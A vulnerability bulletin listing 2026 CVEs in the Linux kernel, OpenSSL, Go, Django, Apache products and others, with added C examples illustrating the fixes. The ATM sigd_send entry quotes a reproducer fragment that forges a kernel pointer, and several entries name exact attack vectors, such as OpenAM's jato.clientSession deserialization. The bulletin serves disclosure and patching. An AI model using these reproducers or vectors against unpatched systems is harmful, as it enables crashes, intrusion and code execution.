| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: unset conn->binding on failed binding request When a multichannel SMB2_SESSION_SETUP request with SMB2_SESSION_REQ_FLAG_BINDING fails, ksmbd sets conn->binding = true but never clears it on the error path. This leaves the connection in a binding state where all subsequent ksmbd_session_lookup_all() calls fall back to the global sessions table. This is fixed by clearing conn->binding = false in the error path. | 2026-04-06 | not yet calculated | CVE-2026-31409 | https://git.kernel.org/stable/c/d073870dab8f6dadced81d13d273ff0b21cb7f4e https://git.kernel.org/stable/c/6ebef4a220a1ebe345de899ebb9ae394206fe921 https://git.kernel.org/stable/c/89afe5e2dbea6e9d8e5f11324149d06fa3a4efca https://git.kernel.org/stable/c/9feb2d1bf86d9e5e66b8565f37f8d3a7d281a772 https://git.kernel.org/stable/c/6260fc85ed1298a71d24a75d01f8b2e56d489a60 https://git.kernel.org/stable/c/282343cf8a4a5a3603b1cb0e17a7083e4a593b03 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: use volume UUID in FS_OBJECT_ID_INFORMATION Use sb->s_uuid for a proper volume identifier as the primary choice. For filesystems that do not provide a UUID, fall back to stfs.f_fsid obtained from vfs_statfs(). | 2026-04-06 | not yet calculated | CVE-2026-31410 | https://git.kernel.org/stable/c/ce00616bc1df675bfdacc968f2bf7c51f4669227 https://git.kernel.org/stable/c/3d80ebe6d1b7bc9ad20fd9b0c1a0c56d804f8a0a https://git.kernel.org/stable/c/c283a6ffe6d5d6e5594d991286b9ce15951572e1 https://git.kernel.org/stable/c/3a64125730cabc34fccfbc230c2667c2e14f7308 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: atm: fix crash due to unvalidated vcc pointer in sigd_send() Reproducer available at [1]. The ATM send path (sendmsg -> vcc_sendmsg -> sigd_send) reads the vcc pointer from msg->vcc and uses it directly without any validation. This pointer comes from userspace via sendmsg() and can be arbitrarily forged: int fd = socket(AF_ATMSVC, SOCK_DGRAM, 0); ioctl(fd, ATMSIGD_CTRL); // become ATM signaling daemon struct msghdr msg = { .msg_iov = &iov, ... }; *(unsigned long *)(buf + 4) = 0xdeadbeef; // fake vcc pointer sendmsg(fd, &msg, 0); // kernel dereferences 0xdeadbeef In normal operation, the kernel sends the vcc pointer to the signaling daemon via sigd_enq() when processing operations like connect(), bind(), or listen(). The daemon is expected to return the same pointer when responding. However, a malicious daemon can send arbitrary pointer values. Fix this by introducing find_get_vcc() which validates the pointer by searching through vcc_hash (similar to how sigd_close() iterates over all VCCs), and acquires a reference via sock_hold() if found. Since struct atm_vcc embeds struct sock as its first member, they share the same lifetime. Therefore using sock_hold/sock_put is sufficient to keep the vcc alive while it is being used. Note that there may be a race with sigd_close() which could mark the vcc with various flags (e.g., ATM_VF_RELEASED) after find_get_vcc() returns. However, sock_hold() guarantees the memory remains valid, so this race only affects the logical state, not memory safety. [1]: https://gist.github.com/mrpre/1ba5949c45529c511152e2f4c755b0f3 | 2026-04-08 | not yet calculated | CVE-2026-31411 | https://git.kernel.org/stable/c/c96549d07dfdd51aadf0722cfb40711574424840 https://git.kernel.org/stable/c/1c8bda3df028d5e54134077dcd09f46ca8cfceb5 https://git.kernel.org/stable/c/3e1a8b00095246a9a2b46b57f6d471c6d3c00ed2 https://git.kernel.org/stable/c/e3f80666c2739296c3b69a127300455c43aa1067 https://git.kernel.org/stable/c/21c303fec138c002f90ed33bce60e807d53072bb https://git.kernel.org/stable/c/69d3f9ee5489e6e8b66defcfa226e91d82393297 https://git.kernel.org/stable/c/440c9a5fc477a8ee259d8bf669531250b8398651 https://git.kernel.org/stable/c/ae88a5d2f29b69819dc7b04086734439d074a643 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_mass_storage: Fix potential integer overflow in check_command_size_in_blocks() The `check_command_size_in_blocks()` function calculates the data size in bytes by left shifting `common->data_size_from_cmnd` by the block size (`common->curlun->blkbits`). However, it does not validate whether this shift operation will cause an integer overflow. Initially, the block size is set up in `fsg_lun_open()` , and the `common->data_size_from_cmnd` is set up in `do_scsi_command()`. During initialization, there is no integer overflow check for the interaction between two variables. So if a malicious USB host sends a SCSI READ or WRITE command requesting a large amount of data (`common->data_size_from_cmnd`), the left shift operation can wrap around. This results in a truncated data size, which can bypass boundary checks and potentially lead to memory corruption or out-of-bounds accesses. Fix this by using the check_shl_overflow() macro to safely perform the shift and catch any overflows. | 2026-04-10 | not yet calculated | CVE-2026-31412 | https://git.kernel.org/stable/c/91817ad5452defe69bc7bc0e355f0ed5d01125cc https://git.kernel.org/stable/c/ce0caaed5940162780c5c223b8ae54968a5f059b https://git.kernel.org/stable/c/228b37936376143f4b60cc6828663f6eaceb81b5 https://git.kernel.org/stable/c/3428dc5520c811e66622b2f5fa43341bf9a1f8b3 https://git.kernel.org/stable/c/387ebb0453b99d71491419a5dc4ab4bee0cacbac https://git.kernel.org/stable/c/8479891d1f04a8ce55366fe4ca361ccdb96f02e1 |
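The f_mass_storage entry above describes a left shift (`data_size_from_cmnd << blkbits`) that can wrap, so that a huge block count from the USB host turns into a small byte count that then passes the buffer-size checks. The block below is an added example written for this page, not the kernel's code: it models the computation in 32-bit arithmetic, shows the wrapped result, and then performs the same shift through a local overflow helper written in the spirit of the kernel's check_shl_overflow() (the helper `shl_overflow_u32` is a reimplementation for the illustration, not the kernel macro). The function names and the sample block count are assumptions.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Added example, not the kernel's f_mass_storage code. Byte count =
 * blocks << blkbits, computed in uint32_t, unchecked and then checked. */

/* True when (value << shift) does not fit in 32 bits; on success *dst is
 * the exact result. Local stand-in for the kernel's check_shl_overflow(). */
static bool shl_overflow_u32(uint32_t value, unsigned int shift, uint32_t *dst)
{
    if (shift >= 32) {
        *dst = 0;
        return value != 0;
    }
    uint32_t shifted = value << shift;
    *dst = shifted;
    /* If any set bit fell off the top, shifting back cannot restore value. */
    return (shifted >> shift) != value;
}

/* Unchecked: a large block count silently wraps to a small byte count. */
uint32_t data_size_bytes_unchecked(uint32_t blocks, unsigned int blkbits)
{
    return blocks << blkbits;
}

/* Checked: the exact byte count, or 0 (never a valid READ/WRITE length
 * here) when the shift would wrap, so the command is rejected. */
uint32_t data_size_bytes_checked(uint32_t blocks, unsigned int blkbits)
{
    uint32_t bytes;
    if (shl_overflow_u32(blocks, blkbits, &bytes))
        return 0;
    return bytes;
}

/* The boundary check that a wrapped size would otherwise slip past:
 * does the requested transfer fit in a buffer of buf_len bytes? */
bool command_fits(uint32_t blocks, unsigned int blkbits, uint32_t buf_len)
{
    uint32_t bytes = data_size_bytes_checked(blocks, blkbits);
    return bytes != 0 && bytes <= buf_len;
}

int main(void)
{
    /* Constructed host request: 0x00800001 blocks of 512 bytes (blkbits 9).
     * The true size is 0x100000200 bytes, which needs 33 bits. */
    const uint32_t blocks = 0x00800001u;
    printf("unchecked: %u bytes (wrapped)\n", data_size_bytes_unchecked(blocks, 9));
    printf("checked:   %u (0 = rejected)\n", data_size_bytes_checked(blocks, 9));
    printf("fits a 4096-byte buffer? %s\n", command_fits(blocks, 9, 4096) ? "yes" : "no");
    return 0;
}
```

With the sample request, the unchecked path reports 512 bytes and the transfer would be accepted against a 4096-byte buffer; the checked path reports an overflow and the command is refused.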
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix unsound scalar forking in maybe_fork_scalars() for BPF_OR maybe_fork_scalars() is called for both BPF_AND and BPF_OR when the source operand is a constant. When dst has signed range [-1, 0], it forks the verifier state: the pushed path gets dst = 0, the current path gets dst = -1. For BPF_AND this is correct: 0 & K == 0. For BPF_OR this is wrong: 0 | K == K, not 0. The pushed path therefore tracks dst as 0 when the runtime value is K, producing an exploitable verifier/runtime divergence that allows out-of-bounds map access. Fix this by passing env->insn_idx (instead of env->insn_idx + 1) to push_stack(), so the pushed path re-executes the ALU instruction with dst = 0 and naturally computes the correct result for any opcode. | 2026-04-12 | not yet calculated | CVE-2026-31413 | https://git.kernel.org/stable/c/342aa1ee995ef5bbf876096dc3a5e51218d76fa4 https://git.kernel.org/stable/c/58bd87d0e69204dbd739e4387a1edb0c4b1644e7 https://git.kernel.org/stable/c/d13281ae7ea8902b21d99d10a2c8caf0bdec0455 https://git.kernel.org/stable/c/c845894ebd6fb43226b3118d6b017942550910c5 |
| OpenSSL--OpenSSL | Issue summary: Converting an excessively large OCTET STRING value to a hexadecimal string leads to a heap buffer overflow on 32 bit platforms. Impact summary: A heap buffer overflow may lead to a crash or possibly an attacker controlled code execution or other undefined behavior. If an attacker can supply a crafted X.509 certificate with an excessively large OCTET STRING value in extensions such as the Subject Key Identifier (SKID) or Authority Key Identifier (AKID) which are being converted to hex, the size of the buffer needed for the result is calculated as multiplication of the input length by 3. On 32 bit platforms, this multiplication may overflow resulting in the allocation of a smaller buffer and a heap buffer overflow. Applications and services that print or log contents of untrusted X.509 certificates are vulnerable to this issue. As the certificates would have to have sizes of over 1 Gigabyte, printing or logging such certificates is a fairly unlikely operation and only 32 bit platforms are affected, this issue was assigned Low severity. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-04-07 | not yet calculated | CVE-2026-31789 | OpenSSL Advisory 3.6.2 git commit 3.5.6 git commit 3.4.5 git commit 3.3.7 git commit 3.0.20 git commit |
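The OpenSSL entry above is a size-calculation overflow: rendering an n-byte OCTET STRING as colon-separated hex needs n * 3 bytes, and on a 32-bit size_t that product wraps once n exceeds about 1.4 GB, so the heap buffer is far too small for the write that follows. The block below is an added example written for this page, not OpenSSL's code: it models the sizing in uint32_t to reproduce the 32-bit wrap, shows the checked computation that refuses such inputs, and renders a constructed 5-byte key identifier into a buffer sized by the checked path. The function names, the "AA:BB:CC" layout assumed for the output, and the sample bytes are assumptions for the illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not OpenSSL's code. Each input byte becomes two hex digits
 * plus a ':' (or the final NUL), so an n-byte string needs n * 3 bytes. The
 * sizing is done in uint32_t to model a 32-bit size_t. */

/* 32-bit model of the unchecked size: wraps modulo 2^32. */
uint32_t hex_buf_len_unchecked32(uint32_t n)
{
    return n * 3u;
}

/* Checked size: bytes to allocate, or 0 when n * 3 would not fit. */
uint32_t hex_buf_len_checked32(uint32_t n)
{
    if (n == 0)
        return 1;                      /* just the NUL */
    if (n > UINT32_MAX / 3u)
        return 0;                      /* refuse rather than wrap */
    return n * 3u;
}

/* Write the colon-separated hex form of oct[0..n) into dst (cap bytes).
 * Returns the number of characters written excluding the NUL, or 0 when
 * dst is too small or n * 3 would overflow size_t on this platform. */
size_t octets_to_hex(const uint8_t *oct, size_t n, char *dst, size_t cap)
{
    static const char digits[] = "0123456789ABCDEF";
    if (n == 0) {
        if (cap == 0) return 0;
        dst[0] = '\0';
        return 0;
    }
    if (n > SIZE_MAX / 3 || cap < n * 3)
        return 0;
    for (size_t i = 0; i < n; i++) {
        dst[3 * i]     = digits[oct[i] >> 4];
        dst[3 * i + 1] = digits[oct[i] & 0x0F];
        dst[3 * i + 2] = (i + 1 < n) ? ':' : '\0';
    }
    return n * 3 - 1;
}

/* Constructed sample: a 5-byte Subject Key Identifier. True when a buffer
 * sized by the checked computation receives the expected text. */
bool demo_render_skid(void)
{
    static const uint8_t skid[5] = { 0xDE, 0xAD, 0xBE, 0xEF, 0x01 };
    char buf[16];
    uint32_t cap = hex_buf_len_checked32(sizeof skid);
    if (cap == 0 || cap > sizeof buf)
        return false;
    size_t len = octets_to_hex(skid, sizeof skid, buf, cap);
    return len == 14 && strcmp(buf, "DE:AD:BE:EF:01") == 0;
}

int main(void)
{
    /* A 1431655766-byte OCTET STRING (about 1.3 GB): three times that is 2^32 + 2. */
    const uint32_t big = 1431655766u;
    printf("unchecked 32-bit size: %u\n", hex_buf_len_unchecked32(big));
    printf("checked 32-bit size:   %u (0 = refused)\n", hex_buf_len_checked32(big));
    printf("sample renders correctly: %s\n", demo_render_skid() ? "yes" : "no");
    return 0;
}
```

The unchecked size for the 1.3 GB input is 2 bytes, which is the allocation the advisory describes being overrun; the checked version returns 0 and the caller refuses to print the extension.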
| OpenSSL--OpenSSL | Issue summary: Applications using RSASVE key encapsulation to establish a secret encryption key can send contents of an uninitialized memory buffer to a malicious peer. Impact summary: The uninitialized buffer might contain sensitive data from the previous execution of the application process which leads to sensitive data leakage to an attacker. RSA_public_encrypt() returns the number of bytes written on success and -1 on error. The affected code tests only whether the return value is non-zero. As a result, if RSA encryption fails, encapsulation can still return success to the caller, set the output lengths, and leave the caller to use the contents of the ciphertext buffer as if a valid KEM ciphertext had been produced. If applications use EVP_PKEY_encapsulate() with RSA/RSASVE on an attacker-supplied invalid RSA public key without first validating that key, then this may cause stale or uninitialized contents of the caller-provided ciphertext buffer to be disclosed to the attacker in place of the KEM ciphertext. As a workaround calling EVP_PKEY_public_check() or EVP_PKEY_public_check_quick() before EVP_PKEY_encapsulate() will mitigate the issue. The FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.1 and 3.0 are affected by this issue. | 2026-04-07 | not yet calculated | CVE-2026-31790 | OpenSSL Advisory 3.6.2 git commit 3.5.6 git commit 3.4.5 git commit 3.3.7 git commit 3.0.20 git commit |
| Sonatype--Nexus Repository | A vulnerability in the task management component of Sonatype Nexus Repository versions 3.22.1 through 3.90.2 allows an authenticated attacker with task creation permissions to execute arbitrary code, bypassing the nexus.scripts.allowCreation security control. | 2026-04-08 | not yet calculated | CVE-2026-3199 | https://help.sonatype.com/en/sonatype-nexus-repository-3-91-0-release-notes.html https://support.sonatype.com/hc/en-us/articles/50615414548499 |
| Erlang--OTP | Improper Certificate Validation vulnerability in Erlang OTP public_key (pubkey_ocsp module) allows OCSP designated-responder authorization bypass via missing signature verification. The OCSP response validation in public_key:pkix_ocsp_validate/5 does not verify that a CA-designated responder certificate was cryptographically signed by the issuing CA. Instead, it only checks that the responder certificate's issuer name matches the CA's subject name and that the certificate has the OCSPSigning extended key usage. An attacker who can intercept or control OCSP responses can create a self-signed certificate with a matching issuer name and the OCSPSigning EKU, and use it to forge OCSP responses that mark revoked certificates as valid. This affects SSL/TLS clients using OCSP stapling, which may accept connections to servers with revoked certificates, potentially transmitting sensitive data to compromised servers. Applications using the public_key:pkix_ocsp_validate/5 API directly are also affected, with impact depending on usage context. This vulnerability is associated with program files lib/public_key/src/pubkey_ocsp.erl and program routines pubkey_ocsp:is_authorized_responder/3. This issue affects OTP from OTP 27.0 until OTP 28.4.2 and 27.3.4.10 corresponding to public_key from 1.16 until 1.20.3 and 1.17.1.2, and ssl from 11.2 until 11.5.4 and 11.2.12.7. | 2026-04-07 | not yet calculated | CVE-2026-32144 | https://github.com/erlang/otp/security/advisories/GHSA-gxrm-pf64-99xm https://cna.erlef.org/cves/CVE-2026-32144.html https://osv.dev/vulnerability/EEF-CVE-2026-32144 https://www.erlang.org/doc/system/versions.html#order-of-versions https://github.com/erlang/otp/commit/ac7ff528be857c5d35eb29c7f24106e3a16d4891 https://github.com/erlang/otp/commit/49033a6d93a5be0ee0dce04e1fb8b4ae7de1e0c0 |
| Gleam--Gleam | Improper path validation vulnerability in the Gleam compiler's handling of git dependencies allows arbitrary file system modification during dependency download. Dependency names from gleam.toml and manifest.toml are incorporated into filesystem paths without sufficient validation or confinement to the intended dependency directory, allowing attacker-controlled paths (via relative traversal such as ../ or absolute paths) to target filesystem locations outside that directory. When resolving git dependencies (e.g. via gleam deps download), the computed path is used for filesystem operations including directory deletion and creation. This vulnerability occurs during the dependency resolution and download phase, which is generally expected to be limited to fetching and preparing dependencies within a confined directory. A malicious direct or transitive git dependency can exploit this issue to delete and overwrite arbitrary directories outside the intended dependency directory, including attacker-chosen absolute paths, potentially causing data loss. In some environments, this may be further leveraged to achieve code execution, for example by overwriting git hooks or shell configuration files. This issue affects Gleam from 1.9.0-rc1 until 1.15.3 and 1.16.0-rc1. | 2026-04-11 | not yet calculated | CVE-2026-32146 | https://github.com/gleam-lang/gleam/security/advisories/GHSA-vq5j-55vx-wq8j https://cna.erlef.org/cves/CVE-2026-32146.html https://osv.dev/vulnerability/EEF-CVE-2026-32146 https://github.com/gleam-lang/gleam/commit/1aa5d8e594b0aa240bb213fce6ee19c65e6d5bcf https://github.com/gleam-lang/gleam/commit/55bb36e6d7febfbbc48c4d001e0ae13eb0312d78 |
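The Gleam entry above is a path-confinement failure: a dependency name from gleam.toml or manifest.toml is joined onto the package directory and then used for delete and create operations, so a name such as `../../.git/hooks` or an absolute path escapes that directory. The block below is an added example written for this page, not the Gleam compiler's code, showing the check a dependency downloader should apply before a manifest-supplied name touches the filesystem: the name must be a single, plain path component, and the joined path is only built when that holds. The allowed character set ([a-z0-9_]), the `build/packages` root and the function names are assumptions for the illustration.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the Gleam compiler's code: confine manifest-supplied
 * dependency names to one plain path component under the package root. */

/* Accept only names that cannot change directory: non-empty, no path
 * separators or drive-letter colons, not "." or "..", and [a-z0-9_] only
 * (an assumed character set for the illustration). */
bool dep_name_is_safe(const char *name)
{
    if (name == NULL || name[0] == '\0')
        return false;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return false;
    for (const char *p = name; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (c == '/' || c == '\\' || c == ':')
            return false;
        if (!(islower(c) || isdigit(c) || c == '_'))
            return false;
    }
    return true;
}

/* Build "<root>/<name>" into out (cap bytes). Returns false when the name is
 * unsafe or the path would be truncated; delete/create operations during
 * dependency download should only ever use paths produced here. */
bool dep_dir_path(const char *root, const char *name, char *out, size_t cap)
{
    if (!dep_name_is_safe(name))
        return false;
    int n = snprintf(out, cap, "%s/%s", root, name);
    return n > 0 && (size_t)n < cap;
}

int main(void)
{
    /* Constructed manifest entries: one honest, three hostile. */
    const char *names[] = { "gleam_stdlib", "../../.git/hooks", "/etc/profile", "C:\\Users" };
    char path[128];
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        if (dep_dir_path("build/packages", names[i], path, sizeof path))
            printf("ok      %s -> %s\n", names[i], path);
        else
            printf("reject  %s\n", names[i]);
    }
    return 0;
}
```

Rejecting separators outright is simpler and more robust than normalising the path and comparing prefixes, because it also excludes the absolute-path case the advisory mentions and leaves nothing for a later `..` component to undo.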
| Go standard library--crypto/x509 | During chain building, the amount of work that is done is not correctly limited when a large number of intermediate certificates are passed in VerifyOptions.Intermediates, which can lead to a denial of service. This affects both direct users of crypto/x509 and users of crypto/tls. | 2026-04-08 | not yet calculated | CVE-2026-32280 | https://go.dev/cl/758320 https://go.dev/issue/78282 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4947 |
| Go standard library--crypto/x509 | Validating certificate chains which use policies is unexpectedly inefficient when certificates in the chain contain a very large number of policy mappings, possibly causing denial of service. This only affects validation of otherwise trusted certificate chains, issued by a root CA in the VerifyOptions.Roots CertPool, or in the system certificate pool. | 2026-04-08 | not yet calculated | CVE-2026-32281 | https://go.dev/cl/758061 https://go.dev/issue/78281 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4946 |
| Go standard library--internal/syscall/unix | On Linux, if the target of Root.Chmod is replaced with a symlink while the chmod operation is in progress, Chmod can operate on the target of the symlink, even when the target lies outside the root. The Linux fchmodat syscall silently ignores the AT_SYMLINK_NOFOLLOW flag, which Root.Chmod uses to avoid symlink traversal. Root.Chmod checks its target before acting and returns an error if the target is a symlink lying outside the root, so the impact is limited to cases where the target is replaced with a symlink between the check and operation. | 2026-04-08 | not yet calculated | CVE-2026-32282 | https://go.dev/cl/763761 https://go.dev/issue/78293 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4864 |
| Go standard library--crypto/tls | If one side of the TLS connection sends multiple key update messages post-handshake in a single record, the connection can deadlock, causing uncontrolled consumption of resources. This can lead to a denial of service. This only affects TLS 1.3. | 2026-04-08 | not yet calculated | CVE-2026-32283 | https://go.dev/cl/763767 https://go.dev/issue/78334 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4870 |
| Go standard library--archive/tar | tar.Reader can allocate an unbounded amount of memory when reading a maliciously-crafted archive containing a large number of sparse regions encoded in the "old GNU sparse map" format. | 2026-04-08 | not yet calculated | CVE-2026-32288 | https://go.dev/cl/763766 https://go.dev/issue/78301 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4869 |
| Go standard library--html/template | Context was not properly tracked across template branches for JS template literals, leading to possibly incorrect escaping of content when branches were used. Additionally template actions within JS template literals did not properly track the brace depth, leading to incorrect escaping being applied. These issues could cause actions within JS template literals to be incorrectly or improperly escaped, leading to XSS vulnerabilities. | 2026-04-08 | not yet calculated | CVE-2026-32289 | https://go.dev/cl/763762 https://go.dev/issue/78331 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4865 |
| Apache Software Foundation--Apache Cassandra | Authenticated DoS over CQL in Apache Cassandra 4.0, 4.1, 5.0 allows an authenticated user to raise query latencies via repeated password changes. Users are recommended to upgrade to version 4.0.20, 4.1.11, 5.0.7, which fixes this issue. | 2026-04-07 | not yet calculated | CVE-2026-32588 | https://lists.apache.org/thread/2tnwjdnss378glxrsmnlzz3k53ftphrc |
| Apache Software Foundation--Apache Tomcat | Improper Input Validation vulnerability in Apache Tomcat due to an incomplete fix of CVE-2025-66614. This issue affects Apache Tomcat: from 11.0.15 through 11.0.19, from 10.1.50 through 10.1.52, from 9.0.113 through 9.0.115. Users are recommended to upgrade to version 11.0.20, 10.1.53 or 9.0.116, which fix the issue. | 2026-04-09 | not yet calculated | CVE-2026-32990 | https://lists.apache.org/thread/1nl9zqft0ksqlhlkd3j4obyjz1ghoyn7 |
| Apache Software Foundation--Apache OpenMeetings | Improper Handling of Insufficient Privileges vulnerability in Apache OpenMeetings. Any registered user can query the web service with their credentials and get files/sub-folders of any folder by ID (metadata only, NOT contents). Metadata includes id, type, name and some other fields. The full list of fields can be checked in the FileItemDTO object. This issue affects Apache OpenMeetings: from 3.10 before 9.0.0. Users are recommended to upgrade to version 9.0.0, which fixes the issue. | 2026-04-09 | not yet calculated | CVE-2026-33005 | https://openmeetings.apache.org/openmeetings-db/apidocs/org.apache.openmeetings.db/org/apache/openmeetings/db/dto/file/FileItemDTO.html https://lists.apache.org/thread/pttoprd628g3xr6lpp3bm1z8m3z8t4p7 |
| djangoproject--Django | An issue was discovered in 6.0 before 6.0.4, 5.2 before 5.2.13, and 4.2 before 4.2.30. `MultiPartParser` allows remote attackers to degrade performance by submitting multipart uploads with `Content-Transfer-Encoding: base64` including excessive whitespace. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Seokchan Yoon for reporting this issue. | 2026-04-07 | not yet calculated | CVE-2026-33033 | Django security archive Django releases announcements Django security releases issued: 6.0.4, 5.2.13, and 4.2.30 |
| djangoproject--Django | An issue was discovered in 6.0 before 6.0.4, 5.2 before 5.2.13, and 4.2 before 4.2.30. ASGI requests with a missing or understated `Content-Length` header could bypass the `DATA_UPLOAD_MAX_MEMORY_SIZE` limit when reading `HttpRequest.body`, allowing remote attackers to load an unbounded request body into memory. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Superior for reporting this issue. | 2026-04-07 | not yet calculated | CVE-2026-33034 | Django security archive Django releases announcements Django security releases issued: 6.0.4, 5.2.13, and 4.2.30 |
| Six Apart Ltd.--Movable Type | Movable Type provided by Six Apart Ltd. contains an SQL Injection vulnerability which may allow an attacker to execute an arbitrary SQL statement. | 2026-04-08 | not yet calculated | CVE-2026-33088 | https://movabletype.org/news/2026/04/mt-907-released.html https://www.sixapart.jp/movabletype/news/2026/04/08-1100.html https://jvn.jp/en/jp/JVN66473735/ |
| Acronis--Acronis True Image OEM | Local privilege escalation due to improper handling of environment variables. The following products are affected: Acronis True Image OEM (macOS) before build 42571, Acronis True Image (macOS) before build 42902. | 2026-04-10 | not yet calculated | CVE-2026-33092 | SEC-9407 |
| Apache Software Foundation--Apache ActiveMQ Client | Improper validation and restriction of a classpath path name vulnerability in Apache ActiveMQ Client, Apache ActiveMQ Broker, Apache ActiveMQ All, Apache ActiveMQ Web, Apache ActiveMQ. In two instances (when creating a Stomp consumer and also when browsing messages in the Web console) an authenticated-user-provided "key" value could be constructed to traverse the classpath due to path concatenation. As a result, the application is exposed to a classpath path resource loading vulnerability that could potentially be chained together with another attack to lead to an exploit. This issue affects Apache ActiveMQ Client: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ Broker: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ All: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ Web: before 5.19.3, from 6.0.0 before 6.2.2; Apache ActiveMQ: before 5.19.3, from 6.0.0 before 6.2.2. Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue. Note: 5.19.3 and 6.2.2 also fix this issue, but that fix is limited to non-Windows environments due to a path separator resolution bug fixed in 5.19.4 and 6.2.3. | 2026-04-07 | not yet calculated | CVE-2026-33227 | https://activemq.apache.org/security-advisories.data/CVE-2026-33227-announcement.txt |
| xwiki--xwiki-platform | XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Prior to 17.4.8 and 17.10.1, an improperly protected scripting API allows any user with script right to bypass the sandboxing of the Velocity scripting API and execute, e.g., arbitrary Python scripts, allowing full access to the XWiki instance and thereby compromising the confidentiality, integrity and availability of the whole instance. Note that script right already constitutes a high level of access that we don't recommend giving to untrusted users. This vulnerability is fixed in 17.4.8 and 17.10.1. | 2026-04-08 | not yet calculated | CVE-2026-33229 | https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h259-74h5-4rh9 https://github.com/xwiki/xwiki-platform/commit/9fe84da66184c05953df9466cf3a4acd15a46e63 https://jira.xwiki.org/browse/XWIKI-23698 https://jira.xwiki.org/browse/XWIKI-23702 |
| Apache Software Foundation--Apache OpenMeetings | Use of Hard-coded Cryptographic Key vulnerability in Apache OpenMeetings. The remember-me cookie encryption key is set to a default value in openmeetings.properties and is not auto-rotated. If the OM admin has not changed the default encryption key, an attacker who has stolen a cookie from a logged-in user can get full user credentials. This issue affects Apache OpenMeetings: from 6.1.0 before 9.0.0. Users are recommended to upgrade to version 9.0.0, which fixes the issue. | 2026-04-09 | not yet calculated | CVE-2026-33266 | https://lists.apache.org/thread/b05jnp9563v49zq494lox9kjbhhf2w66 |
| ICZ Corporation--MATCHA INVOICE | Unrestricted upload of file with dangerous type issue exists in MATCHA INVOICE 2.6.6 and earlier. If this vulnerability is exploited, an arbitrary file may be created by an administrator of the product. As a result, arbitrary code may be executed on the server. | 2026-04-08 | not yet calculated | CVE-2026-33273 | https://oss.icz.co.jp/news/?p=1386 https://jvn.jp/en/jp/JVN33581068/ |
| OpenIdentityPlatform--OpenAM | Open Access Management (OpenAM) is an access management solution. Prior to 16.0.6, OpenIdentityPlatform OpenAM is vulnerable to pre-authentication Remote Code Execution (RCE) via unsafe Java deserialization of the jato.clientSession HTTP parameter. This bypasses the WhitelistObjectInputStream mitigation that was applied to the jato.pageSession parameter after CVE-2021-35464. An unauthenticated attacker can achieve arbitrary command execution on the server by sending a crafted serialized Java object as the jato.clientSession GET/POST parameter to any JATO ViewBean endpoint whose JSP contains <jato:form> tags (e.g., the Password Reset pages). This vulnerability is fixed in 16.0.6. | 2026-04-07 | not yet calculated | CVE-2026-33439 | https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj |
| Checkmk GmbH--Checkmk | Livestatus injection in the monitoring quicksearch in Checkmk <2.5.0b4 allows an authenticated attacker to inject livestatus commands via the search query due to insufficient input sanitization in search filter plugins. | 2026-04-10 | not yet calculated | CVE-2026-33455 | https://checkmk.com/werk/17988 |
| Checkmk GmbH--Checkmk | Livestatus injection in the notification test mode in Checkmk <2.5.0b4 and <2.4.0p26 allows an authenticated user with access to the notification test page to inject arbitrary Livestatus commands via a crafted service description. | 2026-04-10 | not yet calculated | CVE-2026-33456 | https://checkmk.com/werk/17989 |
| Checkmk GmbH--Checkmk | Livestatus injection in the prediction graph page in Checkmk <2.5.0b4, <2.4.0p26, and <2.3.0p47 allows an authenticated user to inject arbitrary Livestatus commands via a crafted service name parameter due to insufficient sanitization of the service description value. | 2026-04-10 | not yet calculated | CVE-2026-33457 | https://checkmk.com/werk/17990 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38, a chained attack can enable otherwise-blocked PHP code from the main/install/ directory and allow an unauthenticated attacker to modify existing files or create new files where allowed by system permissions. This only affects portals with the main/install/ directory still present and read-accessible. This vulnerability is fixed in 1.11.38. | 2026-04-10 | not yet calculated | CVE-2026-33698 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-557g-2w66-gpmf https://github.com/chamilo/chamilo-lms/commit/d3355d7873c7e5b907c5fa84cbd5d9b62ed33e51 |
